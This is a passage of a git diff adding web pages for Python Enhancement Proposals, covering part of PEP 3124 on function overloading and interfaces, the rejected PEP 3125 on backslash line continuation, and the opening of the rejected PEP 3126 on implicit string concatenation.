The first definition above will bind flatten to whatever it was +previously bound to. The second will do the same, if it was already +bound to the when decorator’s first argument. If flatten is +unbound or bound to something else, it will be rebound to the function +definition as given. The last two definitions above will always bind +flatten_basestring to the function definition as given.

+

Using this approach allows you to both give a method a descriptive +name (often useful in tracebacks!) and to reuse the method later.

+

Except as otherwise specified, all overloading decorators have the +same signature and binding rules as @when. They accept a function +and an optional “predicate” object.

+

The default predicate implementation is a tuple of types with +positional matching to the overloaded function’s arguments. However, +an arbitrary number of other kinds of predicates can be created and +registered using the Extension API, and will then be usable with +@when and other decorators created by this module (like +@before, @after, and @around).

+
+
+
+

Method Combination and Overriding

+

When an overloaded function is invoked, the implementation with the +signature that most specifically matches the calling arguments is +the one used. If no implementation matches, a NoApplicableMethods +error is raised. If more than one implementation matches, but none of +the signatures are more specific than the others, an AmbiguousMethods +error is raised.

+

For example, the following pair of implementations are ambiguous, if +the foo() function is ever called with two integer arguments, +because both signatures would apply, but neither signature is more +specific than the other (i.e., neither implies the other):

+
def foo(bar:int, baz:object):
+    pass
+
+@overload
+def foo(bar:object, baz:int):
+    pass
+
+
+

In contrast, the following pair of implementations can never be +ambiguous, because one signature always implies the other; the +int/int signature is more specific than the object/object +signature:

+
def foo(bar:object, baz:object):
+    pass
+
+@overload
+def foo(bar:int, baz:int):
+    pass
+
+
+

A signature S1 implies another signature S2, if whenever S1 would +apply, S2 would also. A signature S1 is “more specific” than another +signature S2, if S1 implies S2, but S2 does not imply S1.

+

Although the examples above have all used concrete or abstract types +as argument annotations, there is no requirement that the annotations +be such. They can also be “interface” objects (discussed in the +Interfaces and Adaptation section), including user-defined +interface types. (They can also be other objects whose types are +appropriately registered via the Extension API.)

+
+

Proceeding to the “Next” Method

+

If the first parameter of an overloaded function is named +__proceed__, it will be passed a callable representing the next +most-specific method. For example, this code:

+
def foo(bar:object, baz:object):
+    print "got objects!"
+
+@overload
+def foo(__proceed__, bar:int, baz:int):
+    print "got integers!"
+    return __proceed__(bar, baz)
+
+
+

Will print “got integers!” followed by “got objects!”.

+

If there is no next most-specific method, __proceed__ will be +bound to a NoApplicableMethods instance. When called, a new +NoApplicableMethods instance will be raised, with the arguments +passed to the first instance.

+

Similarly, if the next most-specific methods have ambiguous precedence +with respect to each other, __proceed__ will be bound to an +AmbiguousMethods instance, and if called, it will raise a new +instance.

+

Thus, a method can either check if __proceed__ is an error +instance, or simply invoke it. The NoApplicableMethods and +AmbiguousMethods error classes have a common DispatchError +base class, so isinstance(__proceed__, overloading.DispatchError) +is sufficient to identify whether __proceed__ can be safely +called.

+

(Implementation note: using a magic argument name like __proceed__ +could potentially be replaced by a magic function that would be called +to obtain the next method. A magic function, however, would degrade +performance and might be more difficult to implement on non-CPython +platforms. Method chaining via magic argument names, however, can be +efficiently implemented on any Python platform that supports creating +bound methods from functions – one simply recursively binds each +function to be chained, using the following function or error as the +im_self of the bound method.)

+
+
+

“Before” and “After” Methods

+

In addition to the simple next-method chaining shown above, it is +sometimes useful to have other ways of combining methods. For +example, the “observer pattern” can sometimes be implemented by adding +extra methods to a function, that execute before or after the normal +implementation.

+

To support these use cases, the overloading module will supply +@before, @after, and @around decorators, that roughly +correspond to the same types of methods in the Common Lisp Object +System (CLOS), or the corresponding “advice” types in AspectJ.

+

Like @when, all of these decorators must be passed the function to +be overloaded, and can optionally accept a predicate as well:

+
from overloading import before, after
+
+def begin_transaction(db):
+    print "Beginning the actual transaction"
+
+@before(begin_transaction)
+def check_single_access(db: SingletonDB):
+    if db.inuse:
+        raise TransactionError("Database already in use")
+
+@after(begin_transaction)
+def start_logging(db: LoggableDB):
+    db.set_log_level(VERBOSE)
+
+
+

@before and @after methods are invoked either before or after +the main function body, and are never considered ambiguous. That +is, it will not cause any errors to have multiple “before” or “after” +methods with identical or overlapping signatures. Ambiguities are +resolved using the order in which the methods were added to the +target function.

+

“Before” methods are invoked most-specific method first, with +ambiguous methods being executed in the order they were added. All +“before” methods are called before any of the function’s “primary” +methods (i.e. normal @overload methods) are executed.

+

“After” methods are invoked in the reverse order, after all of the +function’s “primary” methods are executed. That is, they are executed +least-specific methods first, with ambiguous methods being executed in +the reverse of the order in which they were added.

+

The return values of both “before” and “after” methods are ignored, +and any uncaught exceptions raised by any methods (primary or other) +immediately end the dispatching process. “Before” and “after” methods +cannot have __proceed__ arguments, as they are not responsible +for calling any other methods. They are simply called as a +notification before or after the primary methods.

+

Thus, “before” and “after” methods can be used to check or establish +preconditions (e.g. by raising an error if the conditions aren’t met) +or to ensure postconditions, without needing to duplicate any existing +functionality.

+
+
+

“Around” Methods

+

The @around decorator declares a method as an “around” method. +“Around” methods are much like primary methods, except that the +least-specific “around” method has higher precedence than the +most-specific “before” method.

+

Unlike “before” and “after” methods, however, “Around” methods are +responsible for calling their __proceed__ argument, in order to +continue the invocation process. “Around” methods are usually used +to transform input arguments or return values, or to wrap specific +cases with special error handling or try/finally conditions, e.g.:

+
from overloading import around
+
+@around(commit_transaction)
+def lock_while_committing(__proceed__, db: SingletonDB):
+    with db.global_lock:
+        return __proceed__(db)
+
+
+

They can also be used to replace the normal handling for a specific +case, by not invoking the __proceed__ function.

+

The __proceed__ given to an “around” method will either be the +next applicable “around” method, a DispatchError instance, +or a synthetic method object that will call all the “before” methods, +followed by the primary method chain, followed by all the “after” +methods, and return the result from the primary method chain.

+

Thus, just as with normal methods, __proceed__ can be checked for +DispatchError-ness, or simply invoked. The “around” method should +return the value returned by __proceed__, unless of course it +wishes to modify or replace it with a different return value for the +function as a whole.

+
+
+

Custom Combinations

+

The decorators described above (@overload, @when, @before, +@after, and @around) collectively implement what in CLOS is +called the “standard method combination” – the most common patterns +used in combining methods.

+

Sometimes, however, an application or library may have use for a more +sophisticated type of method combination. For example, if you +would like to have “discount” methods that return a percentage off, +to be subtracted from the value returned by the primary method(s), +you might write something like this:

+
from overloading import always_overrides, merge_by_default
+from overloading import Around, Before, After, Method, MethodList
+
+class Discount(MethodList):
+    """Apply return values as discounts"""
+
+    def __call__(self, *args, **kw):
+        retval = self.tail(*args, **kw)
+        for sig, body in self.sorted():
+            retval -= retval * body(*args, **kw)
+        return retval
+
+# merge discounts by priority
+merge_by_default(Discount)
+
+# discounts have precedence over before/after/primary methods
+always_overrides(Discount, Before)
+always_overrides(Discount, After)
+always_overrides(Discount, Method)
+
+# but not over "around" methods
+always_overrides(Around, Discount)
+
+# Make a decorator called "discount" that works just like the
+# standard decorators...
+discount = Discount.make_decorator('discount')
+
+# and now let's use it...
+def price(product):
+    return product.list_price
+
+@discount(price)
+def ten_percent_off_shoes(product: Shoe)
+    return Decimal('0.1')
+
+
+

Similar techniques can be used to implement a wide variety of +CLOS-style method qualifiers and combination rules. The process of +creating custom method combination objects and their corresponding +decorators is described in more detail under the Extension API +section.

+

Note, by the way, that the @discount decorator shown will work +correctly with any new predicates defined by other code. For example, +if zope.interface were to register its interface types to work +correctly as argument annotations, you would be able to specify +discounts on the basis of its interface types, not just classes or +overloading-defined interface types.

+

Similarly, if a library like RuleDispatch or PEAK-Rules were to +register an appropriate predicate implementation and dispatch engine, +one would then be able to use those predicates for discounts as well, +e.g.:

+
from somewhere import Pred  # some predicate implementation
+
+@discount(
+    price,
+    Pred("isinstance(product,Shoe) and"
+         " product.material.name=='Blue Suede'")
+)
+def forty_off_blue_suede_shoes(product):
+    return Decimal('0.4')
+
+
+

The process of defining custom predicate types and dispatching engines +is also described in more detail under the Extension API section.

+
+
+
+

Overloading Inside Classes

+

All of the decorators above have a special additional behavior when +they are directly invoked within a class body: the first parameter +(other than __proceed__, if present) of the decorated function +will be treated as though it had an annotation equal to the class +in which it was defined.

+

That is, this code:

+
class And(object):
+    # ...
+    @when(get_conjuncts)
+    def __conjuncts(self):
+        return self.conjuncts
+
+
+

produces the same effect as this (apart from the existence of a +private method):

+
class And(object):
+    # ...
+
+@when(get_conjuncts)
+def get_conjuncts_of_and(ob: And):
+    return ob.conjuncts
+
+
+

This behavior is both a convenience enhancement when defining lots of +methods, and a requirement for safely distinguishing multi-argument +overloads in subclasses. Consider, for example, the following code:

+
class A(object):
+    def foo(self, ob):
+        print "got an object"
+
+    @overload
+    def foo(__proceed__, self, ob:Iterable):
+        print "it's iterable!"
+        return __proceed__(self, ob)
+
+
+class B(A):
+    foo = A.foo     # foo must be defined in local namespace
+
+    @overload
+    def foo(__proceed__, self, ob:Iterable):
+        print "B got an iterable!"
+        return __proceed__(self, ob)
+
+
+

Due to the implicit class rule, calling B().foo([]) will print +“B got an iterable!” followed by “it’s iterable!”, and finally, +“got an object”, while A().foo([]) would print only the messages +defined in A.

+

Conversely, without the implicit class rule, the two “Iterable” +methods would have the exact same applicability conditions, so calling +either A().foo([]) or B().foo([]) would result in an +AmbiguousMethods error.

+

It is currently an open issue to determine the best way to implement +this rule in Python 3.0. Under Python 2.x, a class’ metaclass was +not chosen until the end of the class body, which means that +decorators could insert a custom metaclass to do processing of this +sort. (This is how RuleDispatch, for example, implements the implicit +class rule.)

+

PEP 3115, however, requires that a class’ metaclass be determined +before the class body has executed, making it impossible to use this +technique for class decoration any more.

+

At this writing, discussion on this issue is ongoing.

+
+
+

Interfaces and Adaptation

+

The overloading module provides a simple implementation of +interfaces and adaptation. The following example defines an +IStack interface, and declares that list objects support it:

+
from overloading import abstract, Interface
+
+class IStack(Interface):
+    @abstract
+    def push(self, ob)
+        """Push 'ob' onto the stack"""
+
+    @abstract
+    def pop(self):
+        """Pop a value and return it"""
+
+
+when(IStack.push, (list, object))(list.append)
+when(IStack.pop, (list,))(list.pop)
+
+mylist = []
+mystack = IStack(mylist)
+mystack.push(42)
+assert mystack.pop()==42
+
+
+

The Interface class is a kind of “universal adapter”. It accepts +a single argument: an object to adapt. It then binds all its methods +to the target object, in place of itself. Thus, calling +mystack.push(42) is the same as calling +IStack.push(mylist, 42).

+

The @abstract decorator marks a function as being abstract: i.e., +having no implementation. If an @abstract function is called, +it raises NoApplicableMethods. To become executable, overloaded +methods must be added using the techniques previously described. (That +is, methods can be added using @when, @before, @after, +@around, or any custom method combination decorators.)

+

In the example above, the list.append method is added as a method +for IStack.push() when its arguments are a list and an arbitrary +object. Thus, IStack.push(mylist, 42) is translated to +list.append(mylist, 42), thereby implementing the desired +operation.

+
+

Abstract and Concrete Methods

+

Note, by the way, that the @abstract decorator is not limited to +use in interface definitions; it can be used anywhere that you wish to +create an “empty” generic function that initially has no methods. In +particular, it need not be used inside a class.

+

Also note that interface methods need not be abstract; one could, for +example, write an interface like this:

+
class IWriteMapping(Interface):
+    @abstract
+    def __setitem__(self, key, value):
+        """This has to be implemented"""
+
+    def update(self, other:IReadMapping):
+        for k, v in IReadMapping(other).items():
+            self[k] = v
+
+
+

As long as __setitem__ is defined for some type, the above +interface will provide a usable update() implementation. However, +if some specific type (or pair of types) has a more efficient way of +handling update() operations, an appropriate overload can still +be registered for use in that case.

+
+
+

Subclassing and Re-assembly

+

Interfaces can be subclassed:

+
class ISizedStack(IStack):
+    @abstract
+    def __len__(self):
+        """Return the number of items on the stack"""
+
+# define __len__ support for ISizedStack
+when(ISizedStack.__len__, (list,))(list.__len__)
+
+
+

Or assembled by combining functions from existing interfaces:

+
class Sizable(Interface):
+    __len__ = ISizedStack.__len__
+
+# list now implements Sizable as well as ISizedStack, without
+# making any new declarations!
+
+
+

A class can be considered to “adapt to” an interface at a given +point in time, if no method defined in the interface is guaranteed to +raise a NoApplicableMethods error if invoked on an instance of +that class at that point in time.

+

In normal usage, however, it is “easier to ask forgiveness than +permission”. That is, it is easier to simply use an interface on +an object by adapting it to the interface (e.g. IStack(mylist)) +or invoking interface methods directly (e.g. IStack.push(mylist, +42)), than to try to figure out whether the object is adaptable to +(or directly implements) the interface.

+
+
+

Implementing an Interface in a Class

+

It is possible to declare that a class directly implements an +interface, using the declare_implementation() function:

+
from overloading import declare_implementation
+
+class Stack(object):
+    def __init__(self):
+        self.data = []
+    def push(self, ob):
+        self.data.append(ob)
+    def pop(self):
+        return self.data.pop()
+
+declare_implementation(IStack, Stack)
+
+
+

The declare_implementation() call above is roughly equivalent to +the following steps:

+
when(IStack.push, (Stack,object))(lambda self, ob: self.push(ob))
+when(IStack.pop, (Stack,))(lambda self, ob: self.pop())
+
+
+

That is, calling IStack.push() or IStack.pop() on an instance +of any subclass of Stack, will simply delegate to the actual +push() or pop() methods thereof.

+

For the sake of efficiency, calling IStack(s) where s is an +instance of Stack, may return s rather than an IStack +adapter. (Note that calling IStack(x) where x is already an +IStack adapter will always return x unchanged; this is an +additional optimization allowed in cases where the adaptee is known +to directly implement the interface, without adaptation.)

+

For convenience, it may be useful to declare implementations in the +class header, e.g.:

+
class Stack(metaclass=Implementer, implements=IStack):
+    ...
+
+
+

Instead of calling declare_implementation() after the end of the +suite.

+
+
+

Interfaces as Type Specifiers

+

Interface subclasses can be used as argument annotations to +indicate what type of objects are acceptable to an overload, e.g.:

+
@overload
+def traverse(g: IGraph, s: IStack):
+    g = IGraph(g)
+    s = IStack(s)
+    # etc....
+
+
+

Note, however, that the actual arguments are not changed or adapted +in any way by the mere use of an interface as a type specifier. You +must explicitly cast the objects to the appropriate interface, as +shown above.

+

Note, however, that other patterns of interface use are possible. +For example, other interface implementations might not support +adaptation, or might require that function arguments already be +adapted to the specified interface. So the exact semantics of using +an interface as a type specifier are dependent on the interface +objects you actually use.

+

For the interface objects defined by this PEP, however, the semantics +are as described above. An interface I1 is considered “more specific” +than another interface I2, if the set of descriptors in I1’s +inheritance hierarchy are a proper superset of the descriptors in I2’s +inheritance hierarchy.

+

So, for example, ISizedStack is more specific than both +ISizable and ISizedStack, irrespective of the inheritance +relationships between these interfaces. It is purely a question of +what operations are included within those interfaces – and the +names of the operations are unimportant.

+

Interfaces (at least the ones provided by overloading) are always +considered less-specific than concrete classes. Other interface +implementations can decide on their own specificity rules, both +between interfaces and other interfaces, and between interfaces and +classes.

+
+
+

Non-Method Attributes in Interfaces

+

The Interface implementation actually treats all attributes and +methods (i.e. descriptors) in the same way: their __get__ (and +__set__ and __delete__, if present) methods are called with +the wrapped (adapted) object as “self”. For functions, this has the +effect of creating a bound method linking the generic function to the +wrapped object.

+

For non-function attributes, it may be easiest to specify them using +the property built-in, and the corresponding fget, fset, +and fdel attributes:

+
class ILength(Interface):
+    @property
+    @abstract
+    def length(self):
+        """Read-only length attribute"""
+
+# ILength(aList).length == list.__len__(aList)
+when(ILength.length.fget, (list,))(list.__len__)
+
+
+

Alternatively, methods such as _get_foo() and _set_foo() +may be defined as part of the interface, and the property defined +in terms of those methods, but this is a bit more difficult for users +to implement correctly when creating a class that directly implements +the interface, as they would then need to match all the individual +method names, not just the name of the property or attribute.

+
+
+
+

Aspects

+

The adaptation system described above assumes that adapters are “stateless”, +which is to say that adapters have no attributes or state apart from +that of the adapted object. This follows the “typeclass/instance” +model of Haskell, and the concept of “pure” (i.e., transitively +composable) adapters.

+

However, there are occasionally cases where, to provide a complete +implementation of some interface, some sort of additional state is +required.

+

One possibility of course, would be to attach monkeypatched “private” +attributes to the adaptee. But this is subject to name collisions, +and complicates the process of initialization (since any code using +these attributes has to check for their existence and initialize them +if necessary). It also doesn’t work on objects that don’t have a +__dict__ attribute.

+

So the Aspect class is provided to make it easy to attach extra +information to objects that either:

+
    +
  1. have a __dict__ attribute (so aspect instances can be stored +in it, keyed by aspect class),
  2. +
  3. support weak referencing (so aspect instances can be managed using +a global but thread-safe weak-reference dictionary), or
  4. +
  5. implement or can be adapt to the overloading.IAspectOwner +interface (technically, #1 or #2 imply this).
  6. +
+

Subclassing Aspect creates an adapter class whose state is tied +to the life of the adapted object.

+

For example, suppose you would like to count all the times a certain +method is called on instances of Target (a classic AOP example). +You might do something like:

+
from overloading import Aspect
+
+class Count(Aspect):
+    count = 0
+
+@after(Target.some_method)
+def count_after_call(self:Target, *args, **kw):
+    Count(self).count += 1
+
+
+

The above code will keep track of the number of times that +Target.some_method() is successfully called on an instance of +Target (i.e., it will not count errors unless they occur in a +more-specific “after” method). Other code can then access the count +using Count(someTarget).count.

+

Aspect instances can of course have __init__ methods, to +initialize any data structures. They can use either __slots__ +or dictionary-based attributes for storage.

+

While this facility is rather primitive compared to a full-featured +AOP tool like AspectJ, persons who wish to build pointcut libraries +or other AspectJ-like features can certainly use Aspect objects +and method-combination decorators as a base for building more +expressive AOP tools.

+
+
XXX spec out full aspect API, including keys, N-to-1 aspects, manual
attach/detach/delete of aspect instances, and the IAspectOwner +interface.
+
+
+
+
+

Extension API

+

TODO: explain how all of these work

+

implies(o1, o2)

+

declare_implementation(iface, class)

+

predicate_signatures(ob)

+

parse_rule(ruleset, body, predicate, actiontype, localdict, globaldict)

+

combine_actions(a1, a2)

+

rules_for(f)

+

Rule objects

+

ActionDef objects

+

RuleSet objects

+

Method objects

+

MethodList objects

+

IAspectOwner

+
+
+

Overloading Usage Patterns

+

In discussion on the Python-3000 list, the proposed feature of allowing +arbitrary functions to be overloaded has been somewhat controversial, +with some people expressing concern that this would make programs more +difficult to understand.

+

The general thrust of this argument is that one cannot rely on what a +function does, if it can be changed from anywhere in the program at any +time. Even though in principle this can already happen through +monkeypatching or code substitution, it is considered poor practice to +do so.

+

However, providing support for overloading any function (or so the +argument goes), is implicitly blessing such changes as being an +acceptable practice.

+

This argument appears to make sense in theory, but it is almost entirely +mooted in practice for two reasons.

+

First, people are generally not perverse, defining a function to do one +thing in one place, and then summarily defining it to do the opposite +somewhere else! The principal reasons to extend the behavior of a +function that has not been specifically made generic are to:

+
    +
  • Add special cases not contemplated by the original function’s author, +such as support for additional types.
  • +
  • Be notified of an action in order to cause some related operation to +be performed, either before the original operation is performed, +after it, or both. This can include general-purpose operations like +adding logging, timing, or tracing, as well as application-specific +behavior.
  • +
+

None of these reasons for adding overloads imply any change to the +intended default or overall behavior of the existing function, however. +Just as a base class method may be overridden by a subclass for these +same two reasons, so too may a function be overloaded to provide for +such enhancements.

+

In other words, universal overloading does not equal arbitrary +overloading, in the sense that we need not expect people to randomly +redefine the behavior of existing functions in illogical or +unpredictable ways. If they did so, it would be no less of a bad +practice than any other way of writing illogical or unpredictable code!

+

However, to distinguish bad practice from good, it is perhaps necessary +to clarify further what good practice for defining overloads is. And +that brings us to the second reason why generic functions do not +necessarily make programs harder to understand: overloading patterns in +actual programs tend to follow very predictable patterns. (Both in +Python and in languages that have no non-generic functions.)

+

If a module is defining a new generic operation, it will usually also +define any required overloads for existing types in the same place. +Likewise, if a module is defining a new type, then it will usually +define overloads there for any generic functions that it knows or cares +about.

+

As a result, the vast majority of overloads can be found adjacent to +either the function being overloaded, or to a newly-defined type for +which the overload is adding support. Thus, overloads are +highly-discoverable in the common case, as you are either looking at the +function or the type, or both.

+

It is only in rather infrequent cases that one will have overloads in a +module that contains neither the function nor the type(s) for which the +overload is added. This would be the case if, say, a third-party +created a bridge of support between one library’s types and another +library’s generic function(s). In such a case, however, best practice +suggests prominently advertising this, especially by way of the module +name.

+

For example, PyProtocols defines such bridge support for working with +Zope interfaces and legacy Twisted interfaces, using modules called +protocols.twisted_support and protocols.zope_support. (These +bridges are done with interface adapters, rather than generic functions, +but the basic principle is the same.)

+

In short, understanding programs in the presence of universal +overloading need not be any more difficult, given that the vast majority +of overloads will either be adjacent to a function, or the definition of +a type that is passed to that function.

+

And, in the absence of incompetence or deliberate intention to be +obscure, the few overloads that are not adjacent to the relevant type(s) +or function(s), will generally not need to be understood or known about +outside the scope where those overloads are defined. (Except in the +“support modules” case, where best practice suggests naming them +accordingly.)

+
+
+

Implementation Notes

+

Most of the functionality described in this PEP is already implemented +in the in-development version of the PEAK-Rules framework. In +particular, the basic overloading and method combination framework +(minus the @overload decorator) already exists there. The +implementation of all of these features in peak.rules.core is 656 +lines of Python at this writing.

+

peak.rules.core currently relies on the DecoratorTools and +BytecodeAssembler modules, but both of these dependencies can be +replaced, as DecoratorTools is used mainly for Python 2.3 +compatibility and to implement structure types (which can be done +with named tuples in later versions of Python). The use of +BytecodeAssembler can be replaced using an “exec” or “compile” +workaround, given a reasonable effort. (It would be easier to do this +if the func_closure attribute of function objects was writable.)

+

The Interface class has been previously prototyped, but is not +included in PEAK-Rules at the present time.

+

The “implicit class rule” has previously been implemented in the +RuleDispatch library. However, it relies on the __metaclass__ +hook that is currently eliminated in PEP 3115.

+

I don’t currently know how to make @overload play nicely with +classmethod and staticmethod in class bodies. It’s not really +clear if it needs to, however.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3124.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3125/index.html b/pep-3125/index.html new file mode 100644 index 00000000000..0bd8e2b14d2 --- /dev/null +++ b/pep-3125/index.html @@ -0,0 +1,353 @@ + + + + + + + + PEP 3125 – Remove Backslash Continuation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3125 – Remove Backslash Continuation

+
+
Author:
+
Jim J. Jewett <JimJJewett at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Apr-2007
+
Post-History:
+
29-Apr-2007, 30-Apr-2007, 04-May-2007
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP is rejected. There wasn’t enough support in favor, the +feature to be removed isn’t all that harmful, and there are some use +cases that would become harder.

+
+
+

Abstract

+

Python initially inherited its parsing from C. While this has been +generally useful, there are some remnants which have been less useful +for Python, and should be eliminated.

+

This PEP proposes elimination of terminal \ as a marker for line +continuation.

+
+
+

Motivation

+

One goal for Python 3000 should be to simplify the language by +removing unnecessary or duplicated features. There are currently +several ways to indicate that a logical line is continued on the +following physical line.

+

The other continuation methods are easily explained as a logical +consequence of the semantics they provide; \ is simply an escape +character that needs to be memorized.

+
+
+

Existing Line Continuation Methods

+
+

Parenthetical Expression - ([{}])

+

Open a parenthetical expression. It doesn’t matter whether people +view the “line” as continuing; they do immediately recognize that the +expression needs to be closed before the statement can end.

+

Examples using each of (), [], and {}:

+
def fn(long_argname1,
+       long_argname2):
+    settings = {"background": "random noise",
+                "volume": "barely audible"}
+    restrictions = ["Warrantee void if used",
+                    "Notice must be received by yesterday",
+                    "Not responsible for sales pitch"]
+
+
+

Note that it is always possible to parenthesize an expression, but it +can seem odd to parenthesize an expression that needs parentheses only +for the line break:

+
assert val>4, (
+    "val is too small")
+
+
+
+
+

Triple-Quoted Strings

+

Open a triple-quoted string; again, people recognize that the string +needs to finish before the next statement starts.

+
banner_message = """
+    Satisfaction Guaranteed,
+    or DOUBLE YOUR MONEY BACK!!!
+
+
+
+
+
+                                    some minor restrictions apply"""
+
+
+
+
+

Terminal \ in the general case

+

A terminal \ indicates that the logical line is continued on the +following physical line (after whitespace). There are no particular +semantics associated with this. This form is never required, although +it may look better (particularly for people with a C language +background) in some cases:

+
>>> assert val>4, \
+        "val is too small"
+
+
+

Also note that the \ must be the final character in the line. If +your editor navigation can add whitespace to the end of a line, that +invisible change will alter the semantics of the program. +Fortunately, the typical result is only a syntax error, rather than a +runtime bug:

+
>>> assert val>4, \
+        "val is too small"
+
+SyntaxError: unexpected character after line continuation character
+
+
+

This PEP proposes to eliminate this redundant and potentially +confusing alternative.

+
+
+

Terminal \ within a string

+

A terminal \ within a single-quoted string, at the end of the +line. This is arguably a special case of the terminal \, but it +is a special case that may be worth keeping.

+
>>> "abd\
+ def"
+'abd def'
+
+
+
    +
  • Pro: Many of the objections to removing \ termination were +really just objections to removing it within literal strings; +several people clarified that they want to keep this literal-string +usage, but don’t mind losing the general case.
  • +
  • Pro: The use of \ for an escape character within strings is well +known.
  • +
  • Contra: But note that this particular usage is odd, because the +escaped character (the newline) is invisible, and the special +treatment is to delete the character. That said, the \ of +\(newline) is still an escape which changes the meaning of the +following character.
  • +
+
+
+
+

Alternate Proposals

+

Several people have suggested alternative ways of marking the line +end. Most of these were rejected for not actually simplifying things.

+

The one exception was to let any unfinished expression signify a line +continuation, possibly in conjunction with increased indentation.

+

This is attractive because it is a generalization of the rule for +parentheses.

+

The initial objections to this were:

+
    +
  • The amount of whitespace may be contentious; expression continuation +should not be confused with opening a new suite.
  • +
  • The “expression continuation” markers are not as clearly marked in +Python as the grouping punctuation “(), [], {}” marks are:
    # Plus needs another operand, so the line continues
    +"abc" +
    +    "def"
    +
    +# String ends an expression, so the line does not
    +# not continue.  The next line is a syntax error because
    +# unary plus does not apply to strings.
    +"abc"
    +    + "def"
    +
    +
    +
  • +
  • Guido objected for technical reasons. [1] The most obvious +implementation would require allowing INDENT or DEDENT tokens +anywhere, or at least in a widely expanded (and ill-defined) set of +locations. While this is of concern only for the internal parsing +mechanism (rather than for users), it would be a major new source of +complexity.
  • +
+

Andrew Koenig then pointed out [2] a better implementation +strategy, and said that it had worked quite well in other +languages. [3] The improved suggestion boiled down to:

+
+
The whitespace that follows an (operator or) open bracket or +parenthesis can include newline characters.

It would be implemented at a very low lexical level – even before +the decision is made to turn a newline followed by spaces into an +INDENT or DEDENT token.

+
+

There is still some concern that it could mask bugs, as in this +example [4]:

+
# Used to be y+1, the 1 got dropped.  Syntax Error (today)
+# would become nonsense.
+x = y+
+f(x)
+
+
+

Requiring that the continuation be indented more than the initial line +would add both safety and complexity.

+
+
+

Open Issues

+
    +
  • Should \-continuation be removed even inside strings?
  • +
  • Should the continuation markers be expanded from just ([{}]) to +include lines ending with an operator?
  • +
  • As a safety measure, should the continuation line be required to be +more indented than the initial line?
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3125.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3126/index.html b/pep-3126/index.html new file mode 100644 index 00000000000..1ae28955a0d --- /dev/null +++ b/pep-3126/index.html @@ -0,0 +1,505 @@ + + + + + + + + PEP 3126 – Remove Implicit String Concatenation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3126 – Remove Implicit String Concatenation

+
+
Author:
+
Jim J. Jewett <JimJJewett at gmail.com>, +Raymond Hettinger <python at rcn.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Apr-2007
+
Post-History:
+
29-Apr-2007, 30-Apr-2007, 07-May-2007
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP is rejected. There wasn’t enough support in favor, the +feature to be removed isn’t all that harmful, and there are some use +cases that would become harder.

+
+
+

Abstract

+

Python inherited many of its parsing rules from C. While this has +been generally useful, there are some individual rules which are less +useful for python, and should be eliminated.

+

This PEP proposes to eliminate implicit string concatenation based +only on the adjacency of literals.

+

Instead of:

+
"abc" "def" == "abcdef"
+
+
+

authors will need to be explicit, and either add the strings:

+
"abc" + "def" == "abcdef"
+
+
+

or join them:

+
"".join(["abc", "def"]) == "abcdef"
+
+
+
+
+

Motivation

+

One goal for Python 3000 should be to simplify the language by +removing unnecessary features. Implicit string concatenation should +be dropped in favor of existing techniques. This will simplify the +grammar and simplify a user’s mental picture of Python. The latter is +important for letting the language “fit in your head”. A large group +of current users do not even know about implicit concatenation. Of +those who do know about it, a large portion never use it or habitually +avoid it. Of those who both know about it and use it, very few could +state with confidence the implicit operator precedence and under what +circumstances it is computed when the definition is compiled versus +when it is run.

+
+

History or Future

+

Many Python parsing rules are intentionally compatible with C. This +is a useful default, but Special Cases need to be justified based on +their utility in Python. We should no longer assume that python +programmers will also be familiar with C, so compatibility between +languages should be treated as a tie-breaker, rather than a +justification.

+

In C, implicit concatenation is the only way to join strings without +using a (run-time) function call to store into a variable. In Python, +the strings can be joined (and still recognized as immutable) using +more standard Python idioms, such + or "".join.

+
+
+

Problem

+

Implicit String concatenation leads to tuples and lists which are +shorter than they appear; this is turn can lead to confusing, or even +silent, errors. For example, given a function which accepts several +parameters, but offers a default value for some of them:

+
def f(fmt, *args):
+    print fmt % args
+
+
+

This looks like a valid call, but isn’t:

+
>>> f("User %s got a message %s",
+      "Bob"
+      "Time for dinner")
+
+Traceback (most recent call last):
+  File "<pyshell#8>", line 2, in <module>
+    "Bob"
+  File "<pyshell#3>", line 2, in f
+    print fmt % args
+TypeError: not enough arguments for format string
+
+
+

Calls to this function can silently do the wrong thing:

+
def g(arg1, arg2=None):
+    ...
+
+# silently transformed into the possibly very different
+# g("arg1 on this linearg2 on this line", None)
+g("arg1 on this line"
+  "arg2 on this line")
+
+
+

To quote Jason Orendorff [#Orendorff]

+
+
Oh. I just realized this happens a lot out here. Where I work, +we use scons, and each SConscript has a long list of filenames:
sourceFiles = [
+    'foo.c'
+    'bar.c',
+    #...many lines omitted...
+    'q1000x.c']
+
+
+

It’s a common mistake to leave off a comma, and then scons +complains that it can’t find ‘foo.cbar.c’. This is pretty +bewildering behavior even if you are a Python programmer, +and not everyone here is.

+
+
+
+
+

Solution

+

In Python, strings are objects and they support the __add__ operator, +so it is possible to write:

+
"abc" + "def"
+
+
+

Because these are literals, this addition can still be optimized away +by the compiler; the CPython compiler already does so. +[2]

+

Other existing alternatives include multiline (triple-quoted) strings, +and the join method:

+
"""This string
+   extends across
+   multiple lines, but you may want to use something like
+   Textwrap.dedent
+   to clear out the leading spaces
+   and/or reformat.
+"""
+
+
+>>> "".join(["empty", "string", "joiner"]) == "emptystringjoiner"
+True
+
+>>> " ".join(["space", "string", "joiner"]) == "space string joiner"
+True
+
+>>> "\n".join(["multiple", "lines"]) == "multiple\nlines" == (
+"""multiple
+lines""")
+True
+
+
+
+
+

Concerns

+
+

